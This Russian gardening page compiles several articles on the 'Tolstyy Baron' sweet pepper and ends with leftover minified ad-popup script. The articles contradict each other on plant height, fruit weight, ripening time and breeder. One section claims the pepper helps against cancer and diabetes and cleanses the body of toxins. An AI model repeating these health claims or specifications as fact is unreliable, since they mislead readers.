25 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание перца сорта толстый барон

Описание перца Толстый барон

Перец Толстый барон категории f1 — высокоурожайный сладкий сорт перцев, который характеризуется крупными плодами, он получил большую популярность среди садоводов. Рассмотрим описание сорта более подробно.

Перец Толстый барон

Характеристика сорта

Перец сладкий Толстый барон имеет второе название — Крупный барин. Он характеризуется средними сроками созревания. С появления первых всходов до наступления технической спелости проходит всего лишь 120 дней. Если ухаживать за растением по всем правилам, первые плоды созревают уже спустя 100 дней.

Этот вид подходит для выращивания во всех регионах страны, его высаживают как в открытый грунт, так и в условия теплицы.

Описание куста

Куст нераскидистый, достигает 50 см в высоту. Согласно характеристике, листья болгарского перца крупные, обладают насыщенным зеленым цветом. На поверхности каждого листа расположены небольшие редкие морщины. Главный стебель развит мощно. Корневая система формируется в вертикальной плоскости.

Описание плодов

  • прямоугольная форма сладкого перца;
  • красный цвет;
  • длина — 25 см;
  • вес с— 100-200 г;
  • стенки толщиной в 1 см;
  • глянцевая поверхность;
  • 4 гнезда для семян внутри плода.

Согласно описанию, сорт высокоурожаен. При правильном уходе с 1 кв. м реально собрать около 6 кг продукции высокого товарного качества. Вкус перца Толстый Барон категории f1 сладкий. Уровень сахара составляет около 10%.

Особую популярность этот красный сорт заработал за высокие показатели витамина группы С. Помимо этого, в нем содержится высокая концентрация витаминов группы В и других полезных микроэлементов.

Выращивание рассады

Сперва семена обеззараживают. Для этого используют марганцовый раствор, в котором на 20 минут замачивают посадочный материал. После этого семена обрабатывают стимуляторами роста (Циркон или Эпин). Для посадки используют рыхлую и легкую почву, поэтому нельзя забывать вносить в 1 кг садовой земли 1 ст. л. перегноя и 1 ст. л. песка.

Высадка в почву

Глубина посадки семян — 2 см. После высаживания семена накрывают слоем земли и тщательно поливают из распылителя. Распылитель используют, чтобы не было чрезмерного количества влаги, иначе корневая система формируется неправильно. Чтобы семена прорастали лучше, поддерживают постоянную температуру в 25°С. 1 раз в 2 дня контейнеры поворачивают другой стороной к источнику света для равномерного развития. Спустя 2 недели при появлении первых всходов температуру снижают до 20°С.

В возрасте 15 дней рассаду пикируют, чтобы развить прочную корневую систему. После этого ее пересаживают в специальные контейнеры, оснащенные дренажем для выведения избытка влаги. После пикировки рассаду нужно поставить в теплое освещенное помещение. Сорт перца Толстый Барон категории f1 нуждается в 15-часовом дневном освещении. Чтобы соблюдать это правило, используют искусственные источники света.

Вкусный и сочный

Пересадка на постоянное место

Когда рассада достигнет возраста в 75 дней и наберет рост в 30 см, ее пересаживают на постоянное место. В зависимости от климата, посадку проводят или в теплице, или в открытом грунте. Посадкк в открытый грунт проводят в начале мая только в южных регионах, в других частях страны пересадку проводят в июне и только в тепличные условия. Важно, чтобы почва прогрелась до 18°С.

Перед высадкой на постоянное место рассаду закаляют. Для этого контейнеры ежедневно выносят на улицу. Процедура проводят на протяжении 14 дней. Чтобы растения не затеняли друг друга, посадку проводят по следующим правилам:

  • расстояние между рядами — 50 см;
  • расстояние между лунками — 40 см;
  • расположение на 1 кв. м — не более 3 кустов.

Если выращивание проводится в теплице, ее каждый день проветривают, ведь высокие температуры способны привести к гибели всей рассады. Максимальная температура в тепличных условиях — 28°С.

Перед Толстый Барон предъявляет минимальные требования к уходу за собой, но им важно следовать, чтобы достичь высоких показателей урожайности:

  • Правильный полив. Его проводят только вечером, исключительно теплой водой. Если корневой системе давать недостаточное количество влаги, растение прекратит рост.
  • Рыхление. Почву аккуратно рыхлят каждые 10-14 дней, не забывая при этом об удалении сорняков. Чтобы каждый раз не проводить такие процедуры, вокруг куста проводят мульчирование с использованием соломы и перегноя. Мульча не позволит сорнякам расти, влага дольше держится в земле, корка на поверхности почвы не образуется. В итоге растение получает нужное количество влаги и воздуха.
  • Удобрение. Подкормки проводят трижды за весь период вегетации. Первую подкормку вносят через 2 недели после посадки рассады в теплицу или открытый грунт. Она подразумевает использование мочевины. В 10 л теплой воды разводят 5 мл препарата и вносят по 1 л под каждый куст. Вторую подкормку с использованием коровяка проводят в момент образования завязей. Третий этап проводят, когда начинают формироваться плоды. Целесообразно использовать минеральные вещества с высоким содержанием калия и фосфора. Препараты направлены на увеличение роста плодов и раскрытие их вкуса.

Заболевания и паразиты

Этот сорт сладкого красного перца обладает иммунитетом к табачной мозаике. Чаще всего он подвергается грибковому заболеванию — вертициллезу. Основные симптомы этой болезни:

  • отставание куста в развитии;
  • наличие деформированных побегов;
  • наличие темных участков на листве.

Впоследствии листья начинают вянуть и опадать. Избавиться от этого заболевания можно с помощью такого препарата, как Триходермин.

Главными паразитами, влияющими на разновидность, считаются слизни, тля и паутинный клещ. Избавиться от них легко, используя такие химические вещества, как Актара или Оксихом.

Сладкий перец «Толстый барон»: особенности выращивания

В многообразии сортов сладкого перца можно выделить сорт «Толстый барон». Крупные, ярко-красные, толстостенные плоды этого сорта, напоминающие пузатого господина барона в красивом наряде, объясняют его название. Тем, кто впервые слышит о «Толстом бароне», представим его во всей красе. В этом помогут фото перца, описание сорта и его основные характеристики. А для заинтересовавшихся персоной «Толстого барона» представим информацию об особенностях выращивания перца этого сорта в теплице и в грунте под открытым небом.

Характеристики перца «Толстый барон»

Перец «Толстый барон» — сорт раннеспелый, если считать от появления первых ростков до технической спелости плода (около 100 дней). До полного же поспевания плодов ярко-красного цвета проходит в среднем 125 дней. Сорт предназначен для выращивания в грунте под открытым небом и в тепличных условиях.

Кусты раскидистые с богатой листвой, их высота достигает в среднем 110 см. Плоды очень крупные по размеру (300-400 г), округлой кубовидной формы, имеют толстую стенку (8-10 мм), блестящую и гладкую кожу. Окрас перцев меняется от зеленого до ярко-красного по мере созревания. Перцы сорта «Толстый барон» сочные с приятным ароматом и великолепным сладким вкусом. Сорт считается высокоурожайным, от 7 до 14 кг с 1 кв.м. Все эти характеристики даны с учетом соблюдения правил выращивания и подходящих климатических условий.

Преимущества сорта «Толстый барон»:

  • раннеспелость;
  • высокая урожайность;
  • крупные плоды с толстой стенкой, что обеспечивает возможность долгого хранения и транспортировки;
  • отменные вкусовые качества и сочность плодов;
  • неприхотлив в выращивании;
  • пригоден для использования в свежем и консервированном виде;
  • устойчив к вирусу табачной мозаики.

Заготовка рассады из семян перца «Толстый барон»

Чтобы вырастить сильное и здоровое растение перца, необходимо приготовить заранее рассаду. Это касается и сорта «Толстый барон».

Семена для рассады высаживают в конце зимы или начале весны в землю, смешанную с опилками и древесной золой, так как для перца важно производить посадку в рыхлую почву. Семена погружаются на 1-2 см, накрываются землей и опрыскиваются водой. Подходящая температура для проращивания семян около 25°С.

Совет. Емкость с уже посаженными семенами лучше накрыть пленкой или пластмассовой крышкой для поддержания нужной влажности (примерно 70%).

Первые всходы появляются на 12-15 день. Затем необходимо произвести пикировку, чтобы каждое растение могло развить свою прочную корневую систему. Пикировка проводится очень аккуратно, чтобы не повредить корешки. Росточки перца пересаживают в отдельные формы с дренажным отверстием.

По завершении пикировки формы с саженцами помещают в теплое, хорошо освещенное место. Земля вокруг ростков еще раз увлажняется, для этого лучше использовать опрыскиватель. Для создания максимально комфортных условий потребуется дополнительное искусственное освещение. Через неделю после пикировки проводится подкормка рассады раствором воды с мочевиной и суперфосфатом, что благотворно скажется на формировании растений.

Особенности выращивания перца «Толстый барон»

Готовую рассаду перца 25-30 см (70-80 дней) высаживают либо в землю под открытым небом, либо в теплицу.

Совет. Перед посадкой рассады в постоянное место рекомендуется закаливание растений (ежедневный вынос саженцев на воздух в солнечные и теплые часы на некоторое время).

Особенности, которые следует знать, чтобы вырастить здоровые и сильные растения перца «Толстый барон»:

  1. Грунт должен быть рассыпчатым и воздухопроницаемым, а постоянное место — солнечным.
  2. Установившаяся температурный режим воздуха — 22-25˚С (конец мая — начало июня).
  3. Высадка осуществляется из расчета 3-4 растения на 1 кв.м. во избежание образования тени от соседних кустов.
  4. Растения пересаживаются из форм в грунт методом перевалки, не заглубляют. В виду того, что кусты формируются высокие, их укрепляют опорой и подвязывают.
  5. Необходимо беречь растения от заболеваний (серая гниль, фитофтороз, пятнистое увядание) и вредителей (тли, паутинных клещей, белокрылки) и опрыскивать их профилактически мыльным раствором или по необходимости специальными средствами («Фитоверм», «Актара», «Командор») и инсектицидами.

Уход за перцем «Толстый барон» не сложный, но значимый процесс в создании растениям комфортных условий для роста и развития. Поэтому важно соблюдать следующие правила:

1. Полив лучше осуществлять в вечернее или утреннее время отстоявшейся теплой водой. Корень перца не должен засыхать полностью, так как растение может замедлить свой рост;

2. Выполнять неглубокое рыхление почвы раз в 2 недели и очистку ее от сорняков.

3. Подкормки перца проводят следующим образом:

  • Первая: раствор мочевины (через 14 дней после высадки рассады на постоянное место);
  • Вторая: раствор коровяка (в период формирования бутонов);
  • Третья: раствор минеральных удобрений (в период цветения и завязывания плодов).

Познакомившись лично с «Толстым бароном», Вы непременно подружитесь и станете его поклонником. Ведь перед крупными, красивыми, сочными перцами этого сорта невозможно устоять!

Лучшие сорта сладкого перца — видео

Перец Толстый барон: описание сорта, посадка и уход

Сладкий болгарский перец — один из наших любимых овощей, без которого мы не представляем ни летних овощных салатов, ни заготовок на зиму. Сейчас практически каждый огородник занимается выращиванием этой культуры. Сортов перцев существует огромное множество — есть уже знакомые и проверенные временем, а есть и новые, мало, кому известные.

Перец Толстый Барон — детище преднестровских селекционеров. Сорт создан относительно недавно, но уже успел полюбиться садоводам за красивые и вкусные, с толстой стенкой плоды, характеризующиеся крупными размерами, и компактные низкорослые растения, занимающие немного места.

Описание перца Толстый Барон и его характеристики

Толстый Барон — среднеранний гибрид болгарского перца, выведенный преднестровскими селекционерами в конце 90-х годов прошлого века. Они задались целью создать неприхотливый вид культуры, отличающийся крупными размерами, а так же неприхотливым выращиванием и уходом, который можно возделывать и открытым способом, и под плёнкой. Толстый Барон полностью оправдал ожидания учёных: перцы гибрида — просто загляденье! Сорт занесён в Госреестр нашей страны и выращивается повсеместно.

Внешний вид растения

Кустики гибрида — компактные и красивые:

  • высота их — не более 55 см;
  • корни кустов — мощные, хорошо развитые, основной стебель — толстый и крепкий;
  • крепкие побеги, направленные вверх, обильно покрыты крупной слабоморщинистой листвой сочно-зелёного цвета;
  • средних размеров белые цветки — в виде звёздочек с жёлтой сердцевиной;
  • для повышения урожайности в теплице, цветы перцев требуют дополнительного опыления, которое производят путём потряхивания цветущих растений. Процедуру рекомендуют проводить во время цветения раз в несколько дней около полудня. В открытом грунте опыление происходит естественным путём;
  • на одном кустике одновременно может образовываться до 15 плодов, поэтому растениям необходима подвязка к опоре.

Как выглядят плоды

Перчики гибрида — просто красавцы:

  • вырастают они очень крупными. Вес одного плода может достигать 200 г, иногда и более. Длина перца — до 25 см, а толщина стенки — 1 см;
  • форма овощей — усечённый конус, цвет неспелых плодов — зелёный, по мере поспевания превращается в ярко-красный;
  • сочную ароматную мякоть покрывает тонкая, но очень прочная блестящая кожица;
  • вкус перцев — хороший, невероятно сладкий.

В 100 г плодов содержится:

  • сахаров — около 10%;
  • витамина С — от 30 до 80 мг.

Ценные свойства красного болгарского перца

Ценность болгарского перца характеризуется уникальным химическим составом. Помимо высокого содержания аскорбиновой кислоты, овощи культуры богаты:

  • витаминами А, группы В, Е, К, РР;
  • микро- и макроэлементами — Fe, Zn, I, Cr, K, Mg, P, Na и др.;
  • аминокислотами и органическими кислотами;
  • антиоксидантами, в частности ликопином;
  • эфирными маслами;
  • жирными кислотами;
  • дубильными веществами и др.

Болгарский перец содержит минимум калорий, поэтому его широко используют при ожирении. Благодаря повышенному содержанию аскорбиновой кислоты, плоды культуры способствуют укреплению иммунитета, помогают бороться с простудными, вирусными и инфекционными заболеваниями. Перец полезен при:

  • анемии;
  • сахарном диабете;
  • авитаминозе;
  • сердечно-сосудистых заболеваниях и атеросклерозе;
  • нарушении обменных процессов;
  • онкологических заболеваниях;
  • болезнях дёсен и др.

Постоянное употребление в пищу болгарского перца снижает уровень сахара и холестерина в крови, укрепляет стенки сосудов, очищает организм от зашлакованности и токсических веществ. Благодаря ликопину, происходит омоложение клеток и тканей кожных покровов, блокируются свободные радикалы. Едят перец свежим или после кратковременной термической обработки. При длительной варке или тушении полезные компоненты, входящие в состав овоща, разрушаются.

Применение

Перец Толстый Барон очень полезно употреблять свежим. Помимо этого, из перца готовят множество различных блюд — лечо, маринады, соусы, овощные салаты и др. Его маринуют, солят, сушат, фаршируют, замораживают, с ним делают различные заготовки на зиму. Перец добавляют в мясные и овощные блюда, из него приготавливают разнообразные изысканные закуски.

Когда созревает

Толстый Барон — гибрид среднеранних сроков созревания. Период вегетации его с момента появления первых ростков составляет 110-125 дней. Созревать перчики начинают уже в начале июля. Длится плодоношение до середины осени. Снимают овощи по мере их поспевания.

Какая урожайность

Гибрид — высокоурожаен. При качественном уходе с одного квадратного метра собирают от 5 до 10 кг сладких сочных перцев. Урожай напрямую зависит от условий выращивания.

Устойчивость к климатическим условиям

Растения гибрида предпочитают тепло, поэтому в регионах с прохладным климатом перец данного сорта выращивается под плёночным укрытием. Сорт требователен к поливам и плохо переносит засуху, а также резкие перепады температур. При повышенной влажности существует риск заболеваемости грибковыми болезнями.

Лёжкость и транспортабельность

Плоды Толстого Барона хорошо хранятся как в холодильнике, так и в комнатных условиях при соответствующей влажности воздуха. Перец данного вида прекрасно переносит транспортировку. Благодаря этому, фермерские хозяйства выращивают гибрид на продажу.

Болезни и вредители

Толстый Барон устойчив к такому недугу, как табачная мозаика, но уязвим к вертициллёзному увяданию. Болезнь проявляет себя тем, что листья сначала мельчают, междоузлия становятся короткими. Далее на листьях появляются хлористые пятна и, начинается увядание. Сначала увядают нижние листья, затем болезнь прогрессирует к верхушке растения.

Сверху остаётся несколько листков, которые впоследствии также засыхают, и растение погибает полностью. Болезнь практически не поддаётся лечению, поэтому её легче предотвратить. Для этого растения сразу после высадки в открытый грунт опрыскивают фунгицидами Топсин-М, Фундазол, Максим, Витарос или Превикур согласно инструкции по применению.

Кустики могут пострадать от насекомых-вредителей — слизней, тли и паутинного клеща. Защитят растения от вредителей инсектициды Карбофос, Актара, Искра-М, Конфидор, Кинмикс, Слизнеед.

Выращивание рассады

Выращивают перец Толстый Барон рассадным методом. Сначала сеют семена на рассаду. Делают это в феврале — марте, в зависимости от региона выращивания:

  • перед высадкой семена обрабатывают в слабом растворе марганцовки, а затем на пару часов замачивают в стимуляторе роста. Просушивают на открытом воздухе;
  • грунт, лучше всего готовый, купленный в магазине, насыпают в отдельные стаканчики и увлажняют. В каждый стаканчик сажают по 2-3 семечка. Их слегка вдавливают в землю, затем присыпают;
  • стаканчики ставят в ящик, который накрывают плёнкой и убирают в тёмное тёплое место;
  • после появления первых ростков ящик вынимают, освобождают от плёнки и ставят на хорошо освещённый подоконник. При нехватке света, рассаде обеспечивают дополнительное освещение;
  • сеянцам необходимы полив и подкормка. Поливают по мере необходимости, а подкормки проводят раз в две недели, первую делают через 10 дней после появления всходов;
  • за две недели до высадки в теплицу растения начинают закалять. Их выносят на свежий воздух. Время выдержки на улице ежедневно увеличивают.

Посадка в теплицу или в открытый грунт

В теплицу рассаду высаживают в середине-конце мая, а в открытый грунт — в начале июня. Почву готовят заранее — вскапывают, удаляют корни и траву, вносят минеральное удобрение и органику, рыхлят. Лунки делают так, чтобы на 1 квадратный метр получалось не более 4-х кустов. Для этого между лунками выдерживают расстояние 30-40 см, а между рядками — 50 см. В лунки добавляют немного древесной золы и перегноя, наливают половину литра тёплой воды, затем помещают сеянцы. Ямки закапывают и слегка утрамбовывают.

Как ухаживать

Гибрид — неприхотлив и не требует сложного ухода:

  • растения необходимо поливать по мере пересыхания верхнего слоя грунта;
  • после полива проводят прополку сорняков и рыхление почвы. Чтобы влага быстро не испарялась, а сорняки не росли, пространство вокруг растений можно замульчировать;
  • несколько раз за сезон кустики подкармливают органическим и минеральным удобрением. Удобрения можно чередовать;
  • в теплице нужно поддерживать необходимую влажность.

Отзывы садоводов

Перец Толстый Барон пользуется популярностью у огородников. Он — востребован и любим.

«Я выращиваю несколько видов перцев, в том числе и Толстый Барон. Этот сорт хорош своими великолепными плодами, которые мы едим и просто так, и делаем лечо на зиму. Мне он нравится тем, что стенка у плодов толстая, за счёт этого овощи очень сочные на вкус. Кустики компактные и аккуратные. Выращиваю гибрид в теплице.»

«Первый раз Толстого Барона посадил в прошлом году. Очень понравилось качество овощей, их вкус и красивый вид. Однако урожай получился меньше заявленного — до 5 кг немного не дотянуло. Может, что не так сделал. Но отказываться от сорта не буду — в этом году уже посеял семена на рассаду.»

Заключение

Гибридный вид перца Толстый Барон хорош для выращивания как на личных огородных участках, так и в больших фермерских хозяйствах. Овощи гибрида пользуются спросом не только у садоводов, но и у покупателей. Характеризуется прекрасным вкусом, привлекательным внешним видом и высокими урожаями.

Любимец хозяек за отменный вкус — перец Толстый Барон: полное описание сорта

Перец Толстый барон – интересный вариант из предлагаемого списка Госреестра для умеренной полосы. Сорт хорошо адаптирован, не боится резких похолоданий и перепадов температуры, ценится за плоды внушительных размеров, их однородность и товарность.

Описание и характеристика сорта

Толстый барон — крупноплодный представитель из линейки скороспелых сортов. Он подходит для выращивания на открытых участках и в укрывных грядках.

Перец болгарский растет небольшими кустиками, побеги нераскидистые. Их длина не превышает 50 см. Листовые пластинки крупные, темной окраски. Поверхность листьев слегка морщинистая. Корни и стебли отличает мощность и хорошая развитость.

«Сибирский сад» является оригинатором данной культуры, он вложил в овощ такие качества, как пластичность, крупноплодность, стойкость к распространенным патогенам. Сорт можно выращивать по всей стране – в тепличных условиях в Сибири и на Урале, на неукрывных грядках на территории средней полосы и на юге (Краснодар, Крым).

Что полезно знать про перец Барон, его описание:

  • окраска зрелых плодов красная, на стадии дозревания желтая;
  • средняя масса 100-200 г;
  • форма прямоугольная;
  • перикарпий мясистый и толстый (до 10 мм);
  • семенных камер 4;
  • длина доходит до 20-25 см;
  • кожица прочная, глянцевая;
  • вкус с приятной сладостью.

Плоды используют универсально – для свежих блюд и закусок. Перец придает приятный вкус супам и борщам, рагу. Благодаря компактным размерам овощи удобно фаршировать и мариновать целиком. При заморозке не теряется перечный аромат и насыщенность вкуса.

Перцы ценятся за высокий уровень таких компонентов, как аскорбинки, В-группа витаминов, каротин и антиоксидантные вещества. Содержание сахаров доходит до 10%.

Преимущества и недостатки

  • крупноплодность;
  • отличные товарные и вкусовые показатели;
  • транспортабельность без риска повреждений;
  • неприхотливость в уходе;
  • приспособленность к разным неблагоприятным факторам;
  • сильная сопротивляемость вирусным и бактериальным возбудителям (ВТМ);
  • сохранность в поле и в хранилищах;
  • устойчивость к температурным перепадам.

Минусы:

  • есть вероятность нападения вредителей (тля, листоеды, слизни).

Урожайность

Толстый барон приносит с 1 м2 до 5-6 кг товарных перцев.

Посадка

Семенной материал изначально обеззараживают, путем замачивания в 1% марганцовке или в 1% Фитоспорине. Затем семена обрабатывают активаторами роста:

  • Новосил;
  • Агат;
  • Фитоспектр;
  • алоэ в виде сока;
  • зольный раствор;
  • Эпин.

На постоянные грядки рассаду высаживают после закаливания в течение 10-12 суток. На юге пересадку проводят в мае, в северных регионах с наступления июня, когда воздух прогреется до 18 градусов.

Выращивание и уход

Схема расположения перцев — 40 см между лунками, 50 см между рядами. На 1 м2 должно быть не более 3-4 растений. При возделывании овоща в теплицах их проветривают ежедневно. Температуру сохраняют на уровне 26-28 градусов.

Какие требуются агротехнические мероприятия:

Процедуры Особенности
Поливы Время проведения утреннее или вечернее

Кратность 1-2 раза в неделю

Норма на 1 м2 в пределах 8-10 л

Внесение удобрений Подкормки необходимы не менее 3-4 раз

Через 10 дней после высаживания используют мочевину, карбамид, раствор коровяка

При цветении поливают зольным раствором, суперфосфатом

На стадии созревания используют комплексные средства и калийную соль

Обработка поверхности участка Рыхление мотыгами на глубину 3-4 см

Выпалывание сорных трав

Заболевания и паразиты

Толстый барон может поражаться вертициллезом. Проявления инфекции характерные:

  • задержка роста;
  • деформация стеблей;
  • очаги потемнения на листовых пластинках.

Кусты обрабатывают Триходермином. При нападении вредителей-насекомых используют народные и химические средства.

Сорт перца Толстый Барон

Сладкий перец очень полезный и вкусный. Его нередко сажают на участках для получения натурального урожая без химии. Перец Толстый Барон известен многим огородникам своими характеристиками и универсальностью использования. Несмотря на то, что плоды этого перца отличаются большими размерами и товарными качествами, выращивание сорта не трудоемкое, так что не удивительно, что перец Толстый Барон нередко сажают на огородах и дачах.

Описание перца сорта Толстый Барон

Перец Толстый Барон относится к среднеранним видам. От появления всходов и до достижения технической зрелости урожая, проходит в среднем 90-100 суток. Кусты вырастают около 100 см. Листья темно-зеленого цвета, среднего размера, почти гладкие.

Камер может быть 3-4, толщина стенки – 0,7-1 см

На каждом кусте могут одновременно созревать до 15 перчин. Плоды по форме напоминают призму. Средний вес 200-350 г. Шкурка в технической зрелости зеленого, а в потребительской – красного цвета, блестящая, гладкая. Камер может быть 3-4. Толщина стенки – 0,7-1 см. Вкус приятный, аромат хорошо выражен.

Достоинства и недостатки Толстого Барона

У перца Толстый Барон имеются уникальные качества, отличающие его от других сортов. Огородники утверждают, что есть у него как достоинства, так и недостатки!

    Высокий иммунитет к вертициллезному увяданию, но может поражаться вирусом бронзовости томатов.

Перец товарного качества, красивый, ровный, не искривляется, с насыщенным окрасом

Выращивание рассады перца

Выращивать перец Толстый Барон проще всего рассадным методом. Семена на рассаду сеют примерно за 75 суток до посадки ростков на постоянное место. Сеять их можно в общий контейнер или отдельные стаканчики (бумажные, пластиковые, торфяные). После посева, перец засыпают землей так, чтобы глубина посадки была около 1,5 см, и сбрызгивают чистой, отстоянной водой из пульверизатора.

Чтобы создать парниковые условия и спровоцировать прорастание, контейнеры прикрывают пленкой или прозрачным, бесцветным стеклом. При температуре +26…+28 градусов, семена прорастают в течение 5-7 дней. Как только появятся ростки, пленку (стекло) убирают.

Выращивать перец Толстый Барон проще всего рассадным методом

Рассаду нужно вовремя поливать, следить, чтобы земля не бралась коркой. Когда появится 2 целых листика, можно рассадить ростки по отдельным емкостям, если они были в одном контейнере. Культура эта пересадку не любит, так что после пикировки можно заметить замедление в росте. Чтобы этого не произошло, ростки после или во время посадки опрыскивают средством Эпин.

Посадка рассады Толстого Барона в грунт

На постоянное место, перец сажают уже после того, как установится теплая погода и пройдет угроза возвратных морозов. Раньше посадить рассаду можно в теплицу или в парник, чтобы растения были защищены от холодов, сильного ветра.

На квадратном метре участка размещают 3-4 ростка

На квадратном метре участка размещают 3-4 ростка. Для посадки рассады делают лунки. В них раскладывают ростки и присыпают землей. Очень важно проследить, чтобы корневая шейка не была заглублена. Сажают перец на том же уровне, на каком он рос в стаканчиках.

Уход за перцем

Качественного урожая от этого сорта болгарского перца можно ожидать только при хорошем уходе. Благо, он не капризный и быстро растет.

  • Поливы проводят по мере необходимости. Корневая система у перца развита средне, так что стоит следить, чтобы земля была влажной постоянно. Особенно много воды перец потребляет в период цветения.
  • Сократить обильность и частоту поливов, можно разложив под кустками мульчу. Использовать можно солому, торф или что-то подобное. Мульча защитит землю от перегревания, будет удерживать воду, не давая ей быстро испаряться, а также может стать дополнительной подкормкой для корней растения.
  • Очень важно удалять сорные травы по мере их появления. Они не только портят внешний вид участка, но и снижают урожайность перца.
  • Грунт рыхлят, когда он берется корочкой. Это делают, чтобы к корням поступало достаточное количество кислорода.

Из-за большой загруженности (около 15 плодов на кусте), перец необходимо подвязывать

  • Кусты особо не формируют, можно разве что обрывать все листья и боковые побеги до первой развилки веточек.
  • На внесение удобрений перец Толстый Барон положительно отзывается, поэтому за год нужно его подкармливать примерно 3 раза. Использовать для этого можно минералы. Весной культуре необходим азот, а во время формирования завязей и плодов – калий и фосфор.

Перец собирают по мере созревания. Он очень вкусный в свежем виде, поэтому часто используется для приготовления свежих салатов, закусок. Так как перчины довольно крупные, можно использовать перец этого сорта и для фаршировки. Иногда его кладут и в зимнюю консервацию.

Болезни и вредители перца

Иммунитета ко всем болезням у этого сорта нет, так что по мере его развития, возможно поражение тем или иным недугом. Если появилось отставание в росте, странные пятна на листиках, задерживается цветение или наблюдается опадание бутонов, завязей, необходимо срочно провести обработку фунгицидами. Из хороших средств можно рекомендовать «Триходермин», «Топсин-М», «Максим», «Витарос», «Топаз», «Фундазол», «Превикур».

Из вредителей больше всего проблем наблюдается от путинного клеща, тли, слизней. Как только они появились, кустики перца Толстый Барон опрыскивают инсектицидом «Актара», «Конфидор», «Слизнеед», «Актеллик», «Оксихом» или подобными.

Отзывы огородников о перце сорта Толстый Барон

Мнения огородников о перце Толстый Барон представлены ниже.

  • Петр Данилов: «В прошлом году впервые вырастил перец Толстый Барон. Плоды получились около 220 г, сочные, с толстой стенкой – просто идеально. Конечно, урожайность была средней, но это не повод опускать руки. В этом году планирую повторить опыт, но уже не в открытом, а закрытом грунте. Может так урожайность повысится».
  • Татьяна Ромашко: «Мы живем в северном регионе России, так что приходится выращивать культуры в теплицах. К сожалению не все они хорошо принимаются и родят, многим не хватает солнца, тепла. Но перец Толстый Барон показал себя с наилучшей стороны. Он хорошо пережил пересадку рассады, быстро пошел в рост, дал приличный урожай! В это году сделали много лечо и зимних, консервированных салатов с болгарским перцем. Теперь будем сажать его каждый год, ведь он окупает время и средства на свое выращивание».
  • Екатерина Носова: «Толстый Барон люблю за вкус, крупные размеры, мясистость, сочность. Он универсален и подходит для любых блюд. Выращиваю под открытым небом. Кусты в меру высокие, но я их всегда подвязываю, потому что от количества урожая могут клониться к земле. Из обязательного ухода стараюсь 3 раза в год их подкармливать и регулярно поливать. Разумеется, желательно исключить любые сорняки, иначе появятся и болезни и насекомые».
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
